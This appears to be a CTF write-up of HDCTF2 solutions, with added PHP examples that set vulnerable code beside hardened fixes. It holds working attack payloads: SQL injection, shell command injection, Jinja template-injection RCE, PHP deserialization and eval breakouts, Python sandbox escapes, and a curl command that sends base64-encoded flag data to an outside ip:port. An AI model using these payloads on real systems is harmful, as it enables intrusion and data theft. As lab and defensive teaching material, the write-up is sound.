A while ago I took part in HDCTF2, hosted by Hainan University. I entered as an outside (non-student) player and in the end received a small gift from the organizers, for which I'm very grateful.
Web
by Firebasky
signin
View the page source and base64-decode what you find there.
babysql
https://bbs.ichunqiu.com/thread-44483-1-1.html
Count the columns:
payload: 1'order by 3%23
Get the flag: 1'union select 1,2,flag from flag%23
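To make the babysql step concrete, here is an added example (my own code, not the challenge's) that replays the same injection against an in-memory SQLite table and shows the prepared-statement version that stops it. The schema (a `news` table with `id`, `title`, `body`) and the flag value are constructed for the demo; only the `flag` table and column names come from the payload above. SQLite has no `#` comment, so the payload ends in `--` instead of `%23`.

```php
<?php
// Added example, not from the writeup: the babysql injection replayed against an in-memory
// SQLite database constructed here, alongside the prepared-statement version that defeats it.
// The `news` table and its columns are assumptions; the challenge's real schema is unknown.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (1, 'hello', 'world')");
$db->exec('CREATE TABLE flag (flag TEXT)');
$db->exec("INSERT INTO flag VALUES ('HDCTF{sample-flag-constructed-for-this-demo}')");

// Vulnerable: the id is spliced into the SQL text, so a single quote escapes the literal
// and the UNION appends rows from a table the query was never meant to read.
function lookupVulnerable(PDO $db, string $id): array
{
    $sql = "SELECT id, title, body FROM news WHERE id = '$id'";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: the value travels as a bound parameter and is never part of the query text.
function lookupSafe(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Same idea as the writeup's payload; `--` replaces `#` because this is SQLite, not MySQL.
$payload = "1' union select 1,2,flag from flag-- ";

var_export(lookupVulnerable($db, $payload));
// two rows: the real news row, then (1, 2, 'HDCTF{...}') pulled in by the UNION
var_export(lookupSafe($db, $payload));
// array(): the whole payload is compared as a single id value and matches nothing
```

The prepared statement does not "escape" the quote; the database receives the query text and the value as two separate things, so there is nothing for the quote to break out of.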
babyrce
payload:127.0.0.1|cat /flag
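The babyrce payload works because the host parameter is pasted straight into a shell command line. The following added example (my own, not the challenge's source) shows that vulnerable shape next to a hardened version that accepts only a literal IP address and quotes it; the function names are mine.

```php
<?php
// Added example, not the challenge's code: a ping endpoint of the babyrce shape,
// as the vulnerable splice and as a hardened rewrite.

// Vulnerable shape: whatever follows | or ; in the parameter becomes a second command.
function pingCommandVulnerable(string $host): string
{
    return "ping -c 1 " . $host;   // "127.0.0.1|cat /flag" -> ping ... | cat /flag
}

// Hardened: accept only a literal IPv4/IPv6 address, then quote it so the shell sees one word.
function pingCommandSafe(string $host): ?string
{
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return null;               // metacharacters, hostnames and empty input are all rejected
    }
    return "ping -c 1 " . escapeshellarg($host);
}

// Only the validated command ever reaches shell_exec().
function runPing(string $host): string
{
    $cmd = pingCommandSafe($host);
    if ($cmd === null) {
        return "invalid address\n";
    }
    return (string) shell_exec($cmd);
}

var_dump(pingCommandVulnerable('127.0.0.1|cat /flag'));  // "ping -c 1 127.0.0.1|cat /flag"
var_dump(pingCommandSafe('127.0.0.1|cat /flag'));        // NULL
var_dump(pingCommandSafe('127.0.0.1'));                  // "ping -c 1 '127.0.0.1'"
```

Validation and quoting are both kept on purpose: the allowlist is the real control, and `escapeshellarg()` is the safety net if the allowlist is ever loosened to hostnames.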
easy_git
https://www.cnblogs.com/Lmg66/p/13598803.html
Use the GitHack tool:
python GitHack.py -u 8.129.15.153:20003/.git/
HDCTF{ACTF_.git_leak_is_dangerous}
Note: it may not succeed on the first attempt; try a few more times.
backup_file
Download the backup file from /index.php.bak
Loose (weak-typed) comparison
?key=123
easy_file_include
php://filter/read=convert.base64-encode/resource=flag.php
do_u_know_HTTP
Add the headers the hints ask for.
The parameter to add is:
Mg:
erciyuan
This challenge has a couple of pitfalls. The idea is a file inclusion that reads a file, but you have to know the encoding the filename is expected in, and that encoding turns out to be given in the response packet:
Hint: !HDCTF!.php && bin2hex(base64_encode(gzdeflate($file)))
The second pitfall is that ! has been replaced with HnuSec, which you find out by reading the source code:
<?php
$a='HnuSecHDCTFHnuSec.php';
echo (bin2hex(base64_encode(gzdeflate($a))));
#383867724455354e396e4278446e487a41445031436a494b41413d3d
That yields the flag.
hash_hmac
POST:
x[]=1&y[]=2
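The `x[]=1&y[]=2` body turns both POST values into arrays. The added example below (my own code; I assume the check had the shape `hash_hmac('sha256', $x, $key) == hash_hmac('sha256', $y, $key)`, and the key is constructed) shows why that passes on PHP 7 and what a strict version looks like.

```php
<?php
// Added example, not the challenge's code. The check's shape and the key are assumptions.
$key = 'constructed-demo-key';

// Vulnerable shape. With x[]=1&y[]=2 both arguments are arrays: PHP 7 emits a warning and
// hash_hmac() returns NULL, so NULL == NULL succeeds. PHP 8 throws a TypeError instead.
function checkVulnerable($x, $y, string $key): bool
{
    try {
        return @hash_hmac('sha256', $x, $key) == @hash_hmac('sha256', $y, $key);
    } catch (TypeError $e) {
        return false;   // PHP 8 behaviour; left uncaught this would be a 500, not a bypass
    }
}

// Hardened: insist on strings before hashing, and compare digests in constant time.
function checkHardened($x, $y, string $key): bool
{
    if (!is_string($x) || !is_string($y)) {
        return false;   // arrays (and anything else non-string) never reach hash_hmac()
    }
    return hash_equals(hash_hmac('sha256', $x, $key), hash_hmac('sha256', $y, $key));
}

// Simulates what $_POST holds for the body x[]=1&y[]=2.
$x = ['1'];
$y = ['2'];
var_dump(checkVulnerable($x, $y, $key));      // true on PHP 7.x, false on PHP 8
var_dump(checkHardened($x, $y, $key));        // false
var_dump(checkHardened('abc', 'abc', $key));  // true: identical strings, identical HMACs
```

The same `[]` trick applies to any string function that returns NULL on a bad parameter under PHP 7 (`md5`, `sha1`, `strcmp`, ...), so the `is_string` gate is worth applying to every value read from `$_GET` or `$_POST` before it reaches a comparison.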
welcome
Logging in successfully is all it takes.
Username: admin
The password is given to you directly.
calculator_v1
Since the parameter isn't filtered, commands can be executed:
open("flag").read()
__import__('os').popen('cat flag').read()
ezflask
https://www.cnblogs.com/bmjoker/p/13508538.html
https://blog.csdn.net/a3320315/article/details/104102979?utm_source=app
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("cat flag").read()') }} {% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
dudaima
https://zhuanlan.zhihu.com/p/102166928?utm_source=qq
<?php
show_source(__FILE__);
error_reporting(0);
include "lib.php";
class Just4Fun {
public $enter;
public $secret;
}
if(isset($_GET["pass"])) {
$o = unserialize($_GET["pass"]);
$o->secret = bin2hex(random_bytes(256));
if ($o->secret === $o->enter){
echo FLAG;
}else{
die("secret or enter wrong!");
}
}else{
die("no pass");
}
# The code is very simple: if the two properties of Just4Fun are equal, you get the flag.
# We don't know the value of secret, but we do know its address won't change.
payload:
<?php
error_reporting(0);
class Just4Fun {
public $enter;
public $secret;
}
$a = new Just4Fun();
$a->enter = &$a->secret; // a=&b here means a holds a reference to b: however b's value changes, a always equals b
echo serialize($a);
#O:8:"Just4Fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
getshell
<?php
$str = $_POST['str'];
if(isset($str)){
$sp = ",";
$kv = "=";
$arr = str_replace(array($kv,$sp),array('"=>"','","'),'array("'.$str.'")');
eval("\$arr"." = $arr;");
}else{
show_source(__FILE__);
}
Close off the preceding part and comment out the remainder to bypass it:
payload:");system('cat flag.php');//
warmup
Same as welcome.
welcome_to_the_new
Simple deserialization.
# payload
<?php
error_reporting(0);
class Stu{
private $name;
private $age;
private $sex;
public $info = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$someone = new Stu('M&G', 20, 'Man');
echo urlencode(serialize($someone));
calculator_v2
open('flag').__class__.__dict__['re'+'ad'](open('flag'))
simple_trick
https://blog.csdn.net/moliyiran/article/details/81172325
<?php
highlight_file(__FILE__);
include('flag.php');
$a = $_GET['a'];
$b = unserialize ($a);
$b->c = $flag;
foreach($b as $key => $value)
{
if($key==='c')
{
continue;
}
echo $value;
}
?>
# payload
# from m3w
<?php
$a = new stdClass();
// borrow a built-in class to declare the object
$a->b = &$a->c;
// give b a reference to c
// print_r($a);
echo serialize($a);
?>
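Both dudaima and simple_trick rely on the same serialized reference (`R:2`): once two properties alias one value, writing the secret (or the flag) into one of them makes it readable through the other. The added example below (my own code; `Just4Fun` is redeclared here and the function names are mine) builds that payload, runs it against the dudaima-style check, and then against a check that keeps the secret in a local variable the attacker's object cannot alias. The same rule, never write a secret into an object you just unserialized from user input, is the fix for simple_trick too.

```php
<?php
// Added example covering dudaima and simple_trick. Not the challenge code; Just4Fun is
// redeclared here so the block runs on its own.
class Just4Fun
{
    public $enter;
    public $secret;
}

// Builds the writeup's payload: enter and secret become two names for one value.
function buildPayload(): string
{
    $a = new Just4Fun();
    $a->enter = &$a->secret;
    return serialize($a);   // O:8:"Just4Fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
}

// Vulnerable shape from the writeup: the fresh secret is written into the attacker's object,
// and the reference makes enter follow it.
function checkVulnerable(string $pass): bool
{
    $o = unserialize($pass);
    $o->secret = bin2hex(random_bytes(256));
    return $o->secret === $o->enter;
}

// Hardened: restrict which classes may be instantiated, keep the secret in a local that no
// property of $o can reference, and compare in constant time.
function checkHardened(string $pass): bool
{
    $o = unserialize($pass, ['allowed_classes' => ['Just4Fun']]);
    if (!$o instanceof Just4Fun || !is_string($o->enter)) {
        return false;
    }
    $secret = bin2hex(random_bytes(256));   // lives only here; nothing in $o can alias it
    return hash_equals($secret, $o->enter);
}

$payload = buildPayload();
echo $payload, "\n";
var_dump(checkVulnerable($payload));   // true: enter is an alias of secret
var_dump(checkHardened($payload));     // false: enter is NULL, there is nothing for the reference to follow
```

`R:2` means "reference to the second value in the serialized stream", where the object itself is value 1 and `enter` is value 2. A quick detection rule for logs or a WAF is to look for `R:` or `r:` tokens in serialized input, since legitimate clients almost never send self-referencing objects; the real fix is to stop accepting PHP serialization from users at all and use JSON.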
welcome_to_the_new2
Builds on welcome_to_the_new1 by adding PHP's query-string parameter-name parsing quirk.
https://www.freebuf.com/articles/web/213359.html
# payload
<?php
error_reporting(0);
class Stu{
private $name;
private $age;
private $sex;
public $info = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$someone = new Stu('M&G', 20, 'Man');
echo urlencode(serialize($someone));
#O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D
The parameter name and value passed are:
Hai[nan.University=O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D
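The reason `Hai[nan.University` works is that PHP normalises variable names while filling `$_GET`: `.` and spaces become `_`, and an unmatched `[` is treated the same way. The added example below (my own; not the challenge's code) uses `parse_str()`, which runs the same normalisation, to show several spellings that all arrive as `Hai_nan_University`.

```php
<?php
// Added example, not from the writeup: how PHP rewrites query-string variable names.
// parse_str() applies the same rules PHP uses when populating $_GET and $_POST.

function registeredNames(string $query): array
{
    parse_str($query, $vars);
    return array_keys($vars);
}

// A filter that matches the literal name "Hai_nan_University" would miss every variant
// but the last one, even though the script receives them all under that name.
$variants = [
    'Hai[nan.University=1',    // unmatched [ and . both become _
    'Hai.nan.University=1',    // dots become _
    'Hai nan University=1',    // spaces become _
    'Hai_nan_University=1',    // the name the script actually reads
];

foreach ($variants as $q) {
    echo $q, " -> ";
    var_export(registeredNames($q));
    echo "\n";
}
// every line prints: array(0 => 'Hai_nan_University')

// If input must be screened by name, screen the normalised name, not the raw query string.
function isBlockedParameter(string $query, string $blockedName): bool
{
    return in_array($blockedName, registeredNames($query), true);
}
var_dump(isBlockedParameter('Hai[nan.University=1', 'Hai_nan_University'));  // true
```

The practical lesson for a defender is that any check performed on the raw query string (a WAF rule, a regex in a front proxy) sees different names than the PHP script does; inspect `$_GET` keys after PHP has parsed them, or normalise the same way before matching.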
calculator_v3
# m3w's payload
First, use this one to send back the location of the flag:
http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `find / -name \"flag*\"|base64 -w 0` ip:port').re"%2b"ad()")
Then use this one to send back the flag itself:
http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `cat /usr/src/app/flag|base64 -w 0` ip:port').re"%2b"ad()")
ezflask
{{"".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['po'+'pen']("cat fl""ag").read()}}
Misc
签到题 (sign-in)
The flag is handed to you directly.
一步之遥 (one step away)
Fake ZIP encryption: change the 01 at the end of the data to 00.
你知道lsb是什么意思吗 (do you know what LSB means)
Inspect the image with zsteg; it reveals an embedded zip and the flag:
zsteg -E "b1,rgb,lsb,xy" 1.png > flag.zip
Then brute-force the zip using the CRC.
girlfriend
Open the capture in Wireshark and export the image from the HTTP stream to get the flag.
嘤语 (yīng language)
Replace every 嘤 with - and then decode.
你真的了解dns吗 (do you really understand DNS)
Tests DNS TXT record lookups.
payload: nslookup -qt=txt hdctf.0x00.work
Crypto
起源 (origin)
Caesar cipher.
围住世界 (surround the world)
A variant of the rail fence cipher; you have to work out the pattern yourself.
3 6 6 6 3
有趣起来了 (it's getting interesting)
Tests the Atbash cipher.